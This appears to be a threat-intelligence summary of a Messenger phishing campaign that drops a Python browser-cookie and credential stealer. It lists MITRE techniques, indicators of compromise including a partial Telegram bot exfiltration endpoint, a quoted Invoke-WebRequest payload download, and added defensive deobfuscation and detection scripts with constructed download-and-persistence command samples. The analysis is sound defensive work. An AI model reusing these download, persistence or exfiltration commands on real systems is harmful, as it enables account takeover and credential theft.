“MrTonyScam” — Botnet of Facebook Users Launch High-Intent Messenger Phishing Attack on Business…

This report describes a large-scale Messenger phishing campaign (dubbed “MrTonyScam”) that sends RAR/ZIP attachments to Facebook business accounts which drop a multi-stage Python stealer. The operation uses GitHub/GitLab hosting, heavy script obfuscation, and Telegram/Discord bot APIs to exfiltrate browser cookies and saved credentials to underground channels. #MrTonyScam #FacebookMessenger

Keypoints

  • Attackers send mass Facebook Messenger messages to business accounts with compressed attachments that contain a Windows batch dropper.
  • The initial batch (Stage I) downloads and extracts a second batch (Stage II) from GitHub/GitLab which then creates a local Python environment and fetches the main stealer (project.py).
  • Stage II uses an encoding trick (mixed file encoding/UTF-16LE) to hide content and evade static inspection while still executing as a batch script.
  • The Python stealer uses a 5-layer compression/encoding chain and then extracts cookies and saved login data from multiple browsers (Chrome, Edge, Firefox, Brave, Opera, Cốc Cốc, Chromium, etc.).
  • Stolen data is compressed and posted to attacker-controlled Telegram/Discord channels via bot API tokens; the stealer also deletes cookies to lock out victims.
  • Persistence is achieved by writing a startup batch (WindowsSecure.bat) so the stealer runs on every boot; payloads are hosted on free code hosts (GitHub/GitLab) to avoid reputation-based blocks.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Attackers send Messenger messages with compressed archives containing a malicious batch script to lure business owners into executing them (‘luring business owners to click on the malicious attachment’).
  • [T1204.002] User Execution: Malicious File – The received RAR/ZIP contains a Windows batch Stage I dropper that the user must open/execute to initiate the chain (‘This batch script acts as the Stage I Dropper, prepping your system for the real payload.’).
  • [T1105] Ingress Tool Transfer – The dropper downloads additional payload components (Document.zip, project.py, WindowsSecure.bat) directly from GitHub/GitLab using Invoke-WebRequest/curl (‘Invoke-WebRequest -URI https://gitlab.com/… -OutFile C:\Users\Public\Document.zip’).
  • [T1027] Obfuscated Files or Information – The main Python stealer and batch scripts use multiple encodings and compression layers (including a UTF-16LE trick and a 5-layer compress/decode chain) to hide malicious content (‘5 layers of obfuscation’).
  • [T1539] Steal Web Session Cookie – The Python payload enumerates browsers and extracts session cookies to hijack authenticated sessions (‘A simple straightforward Python script that extracts all cookies and login data …’).
  • [T1555.002] Credentials from Web Browsers – The stealer retrieves saved usernames and passwords from various browser databases and decrypts them for exfiltration (‘extracts all cookies and login data (saved usernames and passwords) from several popular browsers’).
  • [T1547.001] Boot or Logon Autostart Execution: Startup Folder – The dropper installs a WindowsSecure.bat into the user Startup folder to ensure the stealer runs at each login (‘Adds persistence in the form of the WindowsSecure.bat file that executes the stealer on every startup.’).
  • [T1041] Exfiltration Over C2 Channel – Collected data is compressed and uploaded via Telegram/Discord bot APIs to attacker-controlled channels (‘sent to a telegram channel using Telegram’s/Discord bot API’).

Indicators of Compromise

  • [Code hosting Git repos] payload hosting and download URLs – gitlab[.]com/xjnhzaj12b2, github[.]com/xjnhzaj12b1, and other repositories (gitlab[.]com/alibaba2023, github[.]com/hahahoho9).
  • [Domain] malicious landing/resource domain – shoppingvideo247.com (used in campaign infrastructure).
  • [Sample filenames] attachment names used in phishing messages – video-86-6p3wlfNcq3eV4ZVleoZZ-22100-18228.rar, ordered-products-VJi85uO5oOH4oD1fV6Px-22100-45036.rar, and ~40+ additional similarly structured filenames.
  • [File hashes] sample malware binaries/archives – a39f0c56dd602fcc14adcdeaa31c21d389af8ea8abcb89862fac19e2807c799d, c8af31d897d7e2ee9babb6a60dec5b65fc4b018e4ce8da6a5d8008ce5926bd54, and dozens more (many hashes listed in the report).
  • [Exfiltration endpoints / bot identifiers] Telegram/Discord exfil targets – example API endpoint pattern ‘https://api[.]telegram[.]org/bot6186662136:AAGyzxWQ0OzgV…/sendDocument’ with chat ID ‘-921942879’ (token and chat tied to attacker channels).

The attack chain begins with a social-engineered Messenger message containing a compressed archive. When opened, the archive supplies a Stage I Windows batch script that downloads a second archive from free code-hosting (GitHub/GitLab), extracts a Stage II batch (vn.cmd) and executes it. The Stage II script leverages a deliberate encoding trick (file encoding confusion/UTF-16LE mixed bytes) to conceal its content from static scanners while still executing; it then uses PowerShell/curl to fetch a Documents.zip and a Python payload (project.py), unpacks a standalone Python environment, and schedules a persistent WindowsSecure.bat in the Startup folder to run on each login.

The core stealer (project.py) is heavily obfuscated: its payload is wrapped in multiple encoding/compression layers (binascii.unhexlify → zlib → bz2 → gzip → lzma → marshal) and executed at runtime. Once deobfuscated, the script enumerates multiple browser data paths (Chrome, Edge, Firefox, Brave, Opera, Cốc Cốc, Chromium), extracts session cookies and stored credentials, decrypts browser-stored secrets, compresses the stolen profiles into an archive, and transmits the archive to attacker-controlled Telegram/Discord bots via their API endpoints. As part of the workflow the script also deletes cookies after extraction to prevent victims from regaining sessions, facilitating account takeover.
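As an added analyst aid (not code from the report or from Guardio), the following Python peels the wrapper layers described above by identifying each container from its magic bytes and unwrapping it without ever exec()ing the result; because detection is data-driven it also handles samples that nest the same layers in a different order. build_sample() constructs a benign stand-in wrapped in the report's five layers; it is constructed test data, not the real project.py payload.

```python
import binascii
import bz2
import gzip
import lzma
import marshal
import zlib

HEX_DIGITS = b"0123456789abcdefABCDEF"


def _identify_layer(buf: bytes):
    """Return (layer_name, decode_fn) for the outermost container, or (None, None)."""
    if buf[:3] == b"BZh":
        return "bz2", bz2.decompress
    if buf[:2] == b"\x1f\x8b":
        return "gzip", gzip.decompress
    if buf[:6] == b"\xfd7zXZ\x00":  # .xz container, which lzma.compress() emits by default
        return "xz", lzma.decompress
    if buf[:1] == b"\x78" and buf[1:2] in (b"\x01", b"\x5e", b"\x9c", b"\xda"):
        return "zlib", zlib.decompress
    body = buf.strip()
    if body and len(body) % 2 == 0 and all(c in HEX_DIGITS for c in body):
        return "hex", lambda b: binascii.unhexlify(b.strip())
    return None, None


def unwrap_layers(blob: bytes, max_layers: int = 16):
    """Peel container layers until an opaque blob remains; nothing is executed."""
    layers = []
    cur = blob
    for _ in range(max_layers):
        name, decode = _identify_layer(cur)
        if name is None:
            break
        cur = decode(cur)
        layers.append(name)
    return cur, layers


def looks_like_marshalled_code(buf: bytes) -> bool:
    """Heuristic: CPython marshal writes a code object as 'c' (0x63), usually with the ref flag (0xE3)."""
    return buf[:1] in (b"c", b"\xe3")


def build_sample():
    """Constructed stand-in (not the real sample): a benign code object wrapped in the
    report's five layers, marshal -> lzma -> gzip -> bz2 -> zlib -> hex."""
    inner = marshal.dumps(compile("x = 1 + 1", "<sample>", "exec"))
    wrapped = binascii.hexlify(zlib.compress(bz2.compress(gzip.compress(lzma.compress(inner)))))
    return wrapped, inner


if __name__ == "__main__":
    wrapped, inner = build_sample()
    payload, layers = unwrap_layers(wrapped)
    print("layers:", " -> ".join(layers), "| marshalled code:", looks_like_marshalled_code(payload))
```

The innermost blob is left as bytes for the analyst; marshal.loads() on untrusted input can crash the interpreter, so decompile it in a sandboxed tool rather than loading it in place.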

Infrastructure choices (hosting payloads on public GitHub/GitLab repositories, using Telegram/Discord bot APIs for exfiltration) and multi-layer obfuscation keep detection low and enable rapid monetization: attackers maintain persistence via Startup folder scripts, and use the stolen session data to sell hijacked business accounts on underground markets. Defenders should flag the described filenames, hosting repos, and bot endpoints and monitor for the batch download-and-execute pattern and runtime decompression/exec behaviors described above.
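Added here as a defender's starting point (not from the report or Guardio): a correlation rule over constructed process-creation events that fires only when a download from a code host is followed on the same host by python launched out of C:\Users\Public or a batch file written to the Startup folder, the pattern described above. The host names, repo path and rule names are assumptions.

```python
import re
from collections import defaultdict

# Patterns for the report's download-and-execute chain (constructed for this example).
CODE_HOSTS = ("github.com", "raw.githubusercontent.com", "gitlab.com")
DOWNLOADER = re.compile(r"\b(invoke-webrequest|iwr|curl(\.exe)?)\b", re.I)
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\[^\s\"]+\.(bat|cmd)\b", re.I)
PYTHON_EXE = re.compile(r"\bpython(w)?(\.exe)?\b", re.I)


def tag_event(cmdline: str) -> set:
    """Map one process command line to the chain stages it resembles."""
    tags = set()
    if DOWNLOADER.search(cmdline) and any(h in cmdline.lower() for h in CODE_HOSTS):
        tags.add("codehost_download")
        if PUBLIC_DIR.search(cmdline):
            tags.add("drop_to_public")
    if PYTHON_EXE.search(cmdline) and PUBLIC_DIR.search(cmdline):
        tags.add("python_from_public")
    if STARTUP_DIR.search(cmdline):
        tags.add("startup_batch")
    return tags


def flag_hosts(events):
    """events: iterable of (host, cmdline). A host is flagged only when the download and a
    follow-on stage both appear; a lone curl to GitHub is far too common to alert on alone."""
    seen = defaultdict(set)
    for host, cmdline in events:
        seen[host] |= tag_event(cmdline)
    return {h: t for h, t in seen.items()
            if "codehost_download" in t and t & {"python_from_public", "startup_batch"}}


# Constructed sample events; the repo path is a placeholder, not the report's IoC.
SAMPLE_EVENTS = [
    ("ws01", 'powershell -c "Invoke-WebRequest -URI https://gitlab.com/<repo>/-/raw/main/Document.zip -OutFile C:\\Users\\Public\\Document.zip"'),
    ("ws01", 'cmd /c copy C:\\Users\\Public\\WindowsSecure.bat "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat"'),
    ("ws01", 'C:\\Users\\Public\\Document\\python.exe C:\\Users\\Public\\Document\\project.py'),
    ("ws02", 'curl -L https://github.com/<org>/<tool>/releases/latest -o C:\\Tools\\tool.zip'),  # ordinary download
]

if __name__ == "__main__":
    for host, tags in flag_hosts(SAMPLE_EVENTS).items():
        print(host, sorted(tags))
```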

Read more: https://medium.com/@guardiosecurity/mrtonyscam-botnet-of-facebook-users-launch-high-intent-messenger-phishing-attack-on-business-3182cfb12f4d?source=rss-6a038e71ff0f——2